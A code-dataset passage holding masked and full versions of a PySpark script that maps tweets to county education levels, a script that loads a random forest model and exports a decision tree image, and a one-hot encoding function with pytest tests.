"step-4": "<mask token>\nCACHE_DIR = 'D:\\\\TwitterDatastream\\\\PYTHONCACHE_SMALL'\nEDU_DATA = 'merged.csv'\nTRAIN_FEAT_CSV = 'testFeat.csv'\nTRAIN_LABS_CSV = 'testLabs.csv'\nTRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'\nFEATURE_NAMES_CSV = 'featureNames.csv'\nsc = SparkContext('local', 'test')\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\nvocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())\nlocation_data = pd.read_csv(EDU_DATA)\narea_dict = dict(zip(location_data['city'], location_data[['fips',\n 'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncounty_dict = dict(zip(location_data['county'], location_data[['fips',\n 'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncoord_dict = {tuple(x[:2]): x[2] for x in location_data[['lat', 'lng',\n 'county']].values}\nlatlon = list()\nfor index, row in location_data.iterrows():\n latlon.append([location_data['lat'][index], location_data['lng'][index]])\nlatlon = np.array(latlon)\nlatlonKDT = spatial.KDTree(latlon)\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\ndef load_tweet(tweet, tweets_saved):\n try:\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try:\n tweet_coordinates = tweet['coordinates']['coordinates']\n except:\n tweet_coordinates = None\n try:\n tweet_place = tweet['place']['full_name']\n except:\n tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location,\n tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n except KeyError:\n return {}, tweets_saved\n data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,\n 'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n tweets_saved += 1\n return data, tweets_saved\n\n\nwordPattern = re.compile('\\\\b[A-Za-z_.,!\\\\\"\\']+\\\\b', re.IGNORECASE)\nhttpPattern = re.compile('^RT |@\\\\S+|http\\\\S+', re.IGNORECASE)\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\ndef combineWordLists(x, y):\n global vocabulary\n if isinstance(x, dict):\n wordDict = x\n xny = y\n else:\n wordDict = dict()\n xny = x + y\n for w in xny:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n return wordDict\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n return tweet_dicts\n\n\ndef filterTweets(tweet):\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n if not text or text == []:\n return False\n if lang != 'en':\n return False\n if education is None or county is None:\n return False\n return True\n\n\ndef storeResults(traindata, vocab):\n columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}\n with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt'\n ) as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt'\n ) as trainFeatLabsFile:\n trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainLabswriter = csv.writer(trainLabsFile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n for row in traindata:\n edu = row[0][1]\n featDict = row[1]\n feats = np.zeros(len(columnIdx))\n for key in featDict:\n try:\n feats[columnIdx[key]] = featDict[key]\n except:\n continue\n trainFeatwriter.writerow(feats.tolist())\n trainLabswriter.writerow(list(edu))\n combList = list(edu) + feats.tolist()\n trainFeatLabswriter.writerow(combList)\n\n\ndef main():\n fileNames = sc.parallelize([])\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(\n root, file))\n fileNames = sc.union([fileNames, subFileNames])\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda\n tweet: filterTweets(tweet))\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda\n tweet: filterTweets(tweet))\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],\n tweet['tweet_education_level']), tweet['tweet_text']))\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)\n ).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True\n )\n print('vocabulary size = ', len(vocab))\n storeResults(tempRes, vocab)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import bz2\nimport json\nimport os\nfrom pyspark.context import SparkContext\nfrom pyspark.accumulators import AccumulatorParam\nimport numpy as np\nfrom scipy import spatial\nimport pandas as pd\nimport re\nimport operator\nimport csv\n\nCACHE_DIR = \"D:\\TwitterDatastream\\PYTHONCACHE_SMALL\"\nEDU_DATA = 'merged.csv'\nTRAIN_FEAT_CSV = 'testFeat.csv'\nTRAIN_LABS_CSV = 'testLabs.csv'\nTRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'\nFEATURE_NAMES_CSV = 'featureNames.csv'\nsc = SparkContext('local', 'test')\n# location_data = pd.read_csv('new_merged.csv')\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n def zero(self, v):\n return set()\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n# An accumulator used to build the word vocabulary\nclass WordsDictAccumulatorParam(AccumulatorParam):\n def zero(self, v):\n return dict()\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n# An accumulator used to build the word vocabulary\n# vocabulary = sc.accumulator(set(), WordsSetAccumulatorParam())\nvocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())\n\n# load Education census data\nlocation_data = pd.read_csv(EDU_DATA)\narea_dict = dict(zip(location_data['city'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncounty_dict = dict(zip(location_data['county'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncoord_dict = {tuple(x[:2]):x[2] for x in location_data[['lat', 'lng', 'county']].values}\n\n# create a KD tree of known county center locations to be used to map a tweet coordinate to a county\nlatlon = list()\nfor index, row in location_data.iterrows():\n latlon.append([location_data['lat'][index], location_data['lng'][index]])\n\nlatlon = np.array(latlon)\nlatlonKDT = spatial.KDTree(latlon)\n\n# function to map place, location or coordinate data from a tweet to a FIPS code of the county and the education\n# level distribution of that county\ndef mapToCounty(place, location, coordinates):\n # coordr_dict = {tuple(x[:2]):x[2] for x in location_data[['lat_r', 'lng_r', 'county']].values}\n if place:\n place = (place.split(\",\")[0]).lower()\n # country = (place.split(\",\")[1]).lower()\n try:\n if area_dict[place]: return area_dict[place]\n except: None\n if location:\n location = (location.split(\",\")[0]).lower()\n try:\n if area_dict[location]: return area_dict[location]\n except: None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n # closest = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)\n # if closest[0] != float('inf') and latlon[closest[1]][0] != 0. and latlon[closest[1]][1] != 0.:\n # print(coordinates, closest, latlon[closest[1]])\n # return closest[0], closest[1]\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[(closest[0], closest[1])]\n return county_dict[county_k]\n\n return None\n\n# Load Tweets from each file (.bz2 or .json)\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == \"\":\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n # print(filename, len(tweets))\n return tweets\n\n# strip each tweet object and keep only whats necessary in a dictonary\ndef load_tweet(tweet, tweets_saved):\n try:\n # tweet_id = tweet['id']\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try: tweet_coordinates = tweet['coordinates']['coordinates']\n except: tweet_coordinates = None\n try: tweet_place = tweet['place']['full_name']\n except: tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location, tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n # created_at = tweet['created_at']\n except KeyError:\n return {}, tweets_saved\n\n data = {'tweet_text': tweet_text,\n # 'tweet_id': tweet_id,\n 'tweet_user_id': tweet_user_id,\n # 'tweet_user_location': tweet_user_location,\n 'tweet_user_lang': tweet_user_lang,\n # 'tweet_place': tweet_place,\n # 'tweet_coordinates': tweet_coordinates,\n 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n # 'date_loaded': datetime.datetime.now(),\n # 'tweet_json': json.dumps(tweet)}\n\n tweets_saved += 1\n return data, tweets_saved\n\nwordPattern = re.compile(r\"\\b[A-Za-z_.,!\\\"']+\\b\", re.IGNORECASE)\nhttpPattern = re.compile(r\"^RT |@\\S+|http\\S+\", re.IGNORECASE)\n\n# Function that uses regular expressions to remove unwanted characters, URLs, etc. and split tweet_text\n# into meaningful words\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub(r\"\", text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words #list(zip(words, [1]*len(words)))\n # print(tweet)\n return tweet\n\n# function to combine word lists and count frequency of each word locally\ndef combineWordLists(x ,y):\n global vocabulary\n if isinstance(x, dict):\n wordDict = x\n xny = y\n else:\n wordDict = dict()\n xny = x + y\n for w in xny:\n # vocabulary +=[w]\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n\n return wordDict\n\n# function to add words to the vocabulary and count frequency of each word globally\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = (x[0],wordDict)\n return x\n\n# read tweets from each file and parse them into dictionaries with only relevant data\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n\n return tweet_dicts\n\n# filter only tweets that have text, land, education and are written in english\ndef filterTweets(tweet):\n # location = tweet['tweet_user_location']\n # coordinates = tweet['tweet_place']\n # place = tweet['tweet_coordinates']\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n # if location or coordinates or place: ret = True\n # else: return False\n if not text or text == []: return False\n if lang != 'en': return False\n if education is None or county is None: return False\n\n return True\n\n# store all data into CSV files\ndef storeResults(traindata, vocab):\n columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}\n\n with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt') as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt') as trainFeatLabsFile:\n trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainLabswriter = csv.writer(trainLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n for row in traindata:\n edu = row[0][1]\n featDict = row[1]\n feats = np.zeros(len(columnIdx))\n for key in featDict:\n try:\n feats[columnIdx[key]] = featDict[key]\n except:\n continue\n trainFeatwriter.writerow(feats.tolist())\n trainLabswriter.writerow(list(edu))\n combList = list(edu) + feats.tolist()\n trainFeatLabswriter.writerow(combList)\n\n# main function with all the Spark code\ndef main():\n fileNames = sc.parallelize([])\n\n # generate a list of all files in the data directory\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(root, file))\n fileNames = sc.union([fileNames, subFileNames])\n # load all tweets and filter\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda tweet: filterTweets(tweet))\n # clean, parse and filter tweets and map each to county and education level\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda tweet: filterTweets(tweet))\n # set county and education level as the key for each tweet and keep only the text as value\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'], tweet['tweet_education_level']), tweet['tweet_text']))\n # aggregate tweets based on county level and generate vocabulary\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n # print(tempRes)\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n # filter out words that only occur once in the entire dataset (mainly noise)\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n # print(\"vocabulary = \", sorted(vocabulary.value.items(), key=operator.itemgetter(1)))\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True)\n # print(\"vocabulary = \", vocab)\n print(\"vocabulary size = \", len(vocab))\n storeResults(tempRes, vocab)\n\nif __name__ == \"__main__\":\n main()",
"step-ids": [
10,
14,
15,
18,
20
]
}
|
[
10,
14,
15,
18,
20
] |
"""
Author: Alan Danque
Date: 20210323
Purpose:Final Data Wrangling, strips html and punctuation.
"""
from sklearn.tree import export_graphviz
import pydot
import pickle
from pathlib import Path
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
import time
start_time = time.time()
pd.options.mode.chained_assignment = None # default='warn' # https://stackoverflow.com/questions/20625582/how-to-deal-with-settingwithcopywarning-in-pandas
results_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')
results_dir.mkdir(parents=True, exist_ok=True)
filepath = "C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv"
data = pd.read_csv(filepath)
print(data.shape)
shape = data.shape
print('\nDataFrame Shape :', shape)
print('\nNumber of rows :', shape[0])
print('\nNumber of columns :', shape[1])
amsmodel1 = data
del amsmodel1['street_address']
amsmodel1.fillna(0, inplace=True)
#amsmodel1.replace(np.nan,0)
print("Dataframe Loaded: --- %s seconds ---" % (time.time() - start_time))
# load model and predict
model_file = results_dir.joinpath('My3rdModel.pkl')
with open(model_file, 'rb') as f:
rf = pickle.load(f)
#rf.predict(X[0:1])
print("Model Loaded: --- %s seconds ---" % (time.time() - start_time))
target = np.array(amsmodel1['price'])
features = amsmodel1.drop('price', axis = 1)
feature_list = list(features.columns)
features = np.array(features)
print(feature_list)
print(features)
print("Features Loaded: --- %s seconds ---" % (time.time() - start_time))
"""
from sklearn.model_selection import RandomizedSearchCV
# Number of trees in random forest
n_estimators = [int(x) for x in np.linspace(start = 200, stop = 2000, num = 10)]
# Number of features to consider at every split
max_features = ['auto', 'sqrt']
# Maximum number of levels in tree
max_depth = [int(x) for x in np.linspace(10, 110, num = 11)]
max_depth.append(None)
# Minimum number of samples required to split a node
min_samples_split = [2, 5, 10]
# Minimum number of samples required at each leaf node
min_samples_leaf = [1, 2, 4]
# Method of selecting samples for training each tree
bootstrap = [True, False]
# Create the random grid
random_grid = {'n_estimators': n_estimators,
'max_features': max_features,
'max_depth': max_depth,
'min_samples_split': min_samples_split,
'min_samples_leaf': min_samples_leaf,
'bootstrap': bootstrap}
print(random_grid)
print("Estimators Loaded: --- %s seconds ---" % (time.time() - start_time))
"""
# Decision Tree
## SAVING THE DECISION TREE
tree = rf.estimators_[5]
tree_dot_file = results_dir.joinpath('tree.dot')
tree_png_file = results_dir.joinpath('tree.png')
dotfile = open(tree_dot_file, 'w')
export_graphviz(tree, out_file = dotfile, feature_names = feature_list, rounded = True, precision = 1)
# Install https://graphviz.org/download/#windows
#(graph, ) = pydot.graph_from_dot_file(tree_dot_file)
#graph.write_png(tree_png_file)
# C:\Program Files\Graphviz\bin
# having issues with pydot.graph_from_dot_file. Since my dot file is getting created using subprocess.
## from subprocess import check_call
## check_call(['dot','-Tpng',dotfile,'-o',tree_png_file])
(graph,) = pydot.graph_from_dot_file(tree_dot_file)
graph.write_png(tree_png_file)
print("DecisionTree: --- %s seconds ---" % (time.time() - start_time))
"""
PyDot Conversion Complete: --- 3804.3111951351166 seconds ---
"""
|
normal
|
{
"blob_id": "b9678b447bc6e7c4e928ffa6b8cd58639e41a801",
"index": 2688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nresults_dir.mkdir(parents=True, exist_ok=True)\n<mask token>\nprint(data.shape)\n<mask token>\nprint(\"\"\"\nDataFrame Shape :\"\"\", shape)\nprint(\"\"\"\nNumber of rows :\"\"\", shape[0])\nprint(\"\"\"\nNumber of columns :\"\"\", shape[1])\n<mask token>\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\nprint('Dataframe Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\nprint('Model Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\nprint(feature_list)\nprint(features)\nprint('Features Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\nexport_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded\n =True, precision=1)\n<mask token>\ngraph.write_png(tree_png_file)\nprint('DecisionTree: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\n",
"step-3": "<mask token>\nstart_time = time.time()\npd.options.mode.chained_assignment = None\nresults_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')\nresults_dir.mkdir(parents=True, exist_ok=True)\nfilepath = 'C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv'\ndata = pd.read_csv(filepath)\nprint(data.shape)\nshape = data.shape\nprint(\"\"\"\nDataFrame Shape :\"\"\", shape)\nprint(\"\"\"\nNumber of rows :\"\"\", shape[0])\nprint(\"\"\"\nNumber of columns :\"\"\", shape[1])\namsmodel1 = data\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\nprint('Dataframe Loaded: --- %s seconds ---' % (time.time() - start_time))\nmodel_file = results_dir.joinpath('My3rdModel.pkl')\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\nprint('Model Loaded: --- %s seconds ---' % (time.time() - start_time))\ntarget = np.array(amsmodel1['price'])\nfeatures = amsmodel1.drop('price', axis=1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\nprint(feature_list)\nprint(features)\nprint('Features Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\ntree = rf.estimators_[5]\ntree_dot_file = results_dir.joinpath('tree.dot')\ntree_png_file = results_dir.joinpath('tree.png')\ndotfile = open(tree_dot_file, 'w')\nexport_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded\n =True, precision=1)\ngraph, = pydot.graph_from_dot_file(tree_dot_file)\ngraph.write_png(tree_png_file)\nprint('DecisionTree: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\n",
"step-4": "<mask token>\nfrom sklearn.tree import export_graphviz\nimport pydot\nimport pickle\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestRegressor\nimport time\nstart_time = time.time()\npd.options.mode.chained_assignment = None\nresults_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')\nresults_dir.mkdir(parents=True, exist_ok=True)\nfilepath = 'C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv'\ndata = pd.read_csv(filepath)\nprint(data.shape)\nshape = data.shape\nprint(\"\"\"\nDataFrame Shape :\"\"\", shape)\nprint(\"\"\"\nNumber of rows :\"\"\", shape[0])\nprint(\"\"\"\nNumber of columns :\"\"\", shape[1])\namsmodel1 = data\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\nprint('Dataframe Loaded: --- %s seconds ---' % (time.time() - start_time))\nmodel_file = results_dir.joinpath('My3rdModel.pkl')\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\nprint('Model Loaded: --- %s seconds ---' % (time.time() - start_time))\ntarget = np.array(amsmodel1['price'])\nfeatures = amsmodel1.drop('price', axis=1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\nprint(feature_list)\nprint(features)\nprint('Features Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\ntree = rf.estimators_[5]\ntree_dot_file = results_dir.joinpath('tree.dot')\ntree_png_file = results_dir.joinpath('tree.png')\ndotfile = open(tree_dot_file, 'w')\nexport_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded\n =True, precision=1)\ngraph, = pydot.graph_from_dot_file(tree_dot_file)\ngraph.write_png(tree_png_file)\nprint('DecisionTree: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\n",
"step-5": "\"\"\"\nAuthor: Alan Danque\nDate: 20210323\nPurpose:Final Data Wrangling, strips html and punctuation.\n\n\"\"\"\nfrom sklearn.tree import export_graphviz\nimport pydot\nimport pickle\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestRegressor\nimport time\nstart_time = time.time()\npd.options.mode.chained_assignment = None # default='warn' # https://stackoverflow.com/questions/20625582/how-to-deal-with-settingwithcopywarning-in-pandas\n\nresults_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')\nresults_dir.mkdir(parents=True, exist_ok=True)\n\nfilepath = \"C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv\"\ndata = pd.read_csv(filepath)\nprint(data.shape)\nshape = data.shape\nprint('\\nDataFrame Shape :', shape)\nprint('\\nNumber of rows :', shape[0])\nprint('\\nNumber of columns :', shape[1])\n\namsmodel1 = data\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\n#amsmodel1.replace(np.nan,0)\n\nprint(\"Dataframe Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\n\n# load model and predict\nmodel_file = results_dir.joinpath('My3rdModel.pkl')\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\n#rf.predict(X[0:1])\n\nprint(\"Model Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\n\ntarget = np.array(amsmodel1['price'])\nfeatures = amsmodel1.drop('price', axis = 1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\nprint(feature_list)\nprint(features)\nprint(\"Features Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\n\"\"\"\n\nfrom sklearn.model_selection import RandomizedSearchCV\n# Number of trees in random forest\nn_estimators = [int(x) for x in np.linspace(start = 200, stop = 2000, num = 10)]\n# Number of features to consider at every split\nmax_features = ['auto', 'sqrt']\n# Maximum number of levels in tree\nmax_depth = [int(x) for x in np.linspace(10, 110, num = 11)]\nmax_depth.append(None)\n# Minimum number of samples required to split a node\nmin_samples_split = [2, 5, 10]\n# Minimum number of samples required at each leaf node\nmin_samples_leaf = [1, 2, 4]\n# Method of selecting samples for training each tree\nbootstrap = [True, False]\n# Create the random grid\nrandom_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\nprint(random_grid)\nprint(\"Estimators Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\"\"\"\n\n\n# Decision Tree\n\n## SAVING THE DECISION TREE\ntree = rf.estimators_[5]\ntree_dot_file = results_dir.joinpath('tree.dot')\ntree_png_file = results_dir.joinpath('tree.png')\ndotfile = open(tree_dot_file, 'w')\nexport_graphviz(tree, out_file = dotfile, feature_names = feature_list, rounded = True, precision = 1)\n\n# Install https://graphviz.org/download/#windows\n#(graph, ) = pydot.graph_from_dot_file(tree_dot_file)\n#graph.write_png(tree_png_file)\n# C:\\Program Files\\Graphviz\\bin\n# having issues with pydot.graph_from_dot_file. Since my dot file is getting created using subprocess.\n## from subprocess import check_call\n## check_call(['dot','-Tpng',dotfile,'-o',tree_png_file])\n\n(graph,) = pydot.graph_from_dot_file(tree_dot_file)\ngraph.write_png(tree_png_file)\n\nprint(\"DecisionTree: --- %s seconds ---\" % (time.time() - start_time))\n\"\"\"\nPyDot Conversion Complete: --- 3804.3111951351166 seconds ---\n\"\"\"\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from typing import List, Tuple
import pytest
def fit_transform(*args: str) -> List[Tuple[str, List[int]]]:
if len(args) == 0:
raise TypeError('expected at least 1 arguments, got 0')
categories = args if isinstance(args[0], str) else list(args[0])
uniq_categories = set(categories)
bin_format = f'{{0:0{len(uniq_categories)}b}}'
seen_categories = dict()
transformed_rows = []
for cat in categories:
bin_view_cat = (int(b) for b in bin_format.format(1 << len(seen_categories)))
seen_categories.setdefault(cat, list(bin_view_cat))
transformed_rows.append((cat, seen_categories[cat]))
return transformed_rows
def test_str_fit_transformr():
assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [
('Moscow', [0, 0, 1]),
('New York', [0, 1, 0]),
('Moscow', [0, 0, 1]),
('London', [1, 0, 0]),
]
def test_int_fit_str_transformr():
assert fit_transform([1, 2, 1, 3]) == [
(1, [0, 0, 1]),
(2, [0, 1, 0]),
(1, [0, 0, 1]),
(3, [1, 0, 0]),
]
# чтобы проверить, что код вызывает исключение, нужно использовать менеджер контекста pytest.raises
def test_error_type_fit_transformr():
with pytest.raises(TypeError):
fit_transform(1)
@pytest.fixture()
def randomize():
from random import randint
return [randint(0, 9) for _ in range(randint(0, 10))]
def test_intv2_fit_transformr(randomize):
print(randomize)
result = fit_transform(randomize)
assert (len(result) == len(randomize))
|
normal
|
{
"blob_id": "b236abaa5e206a8244083ee7f9dcdb16741cb99d",
"index": 3072,
"step-1": "<mask token>\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\n<mask token>\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\n<mask token>\n",
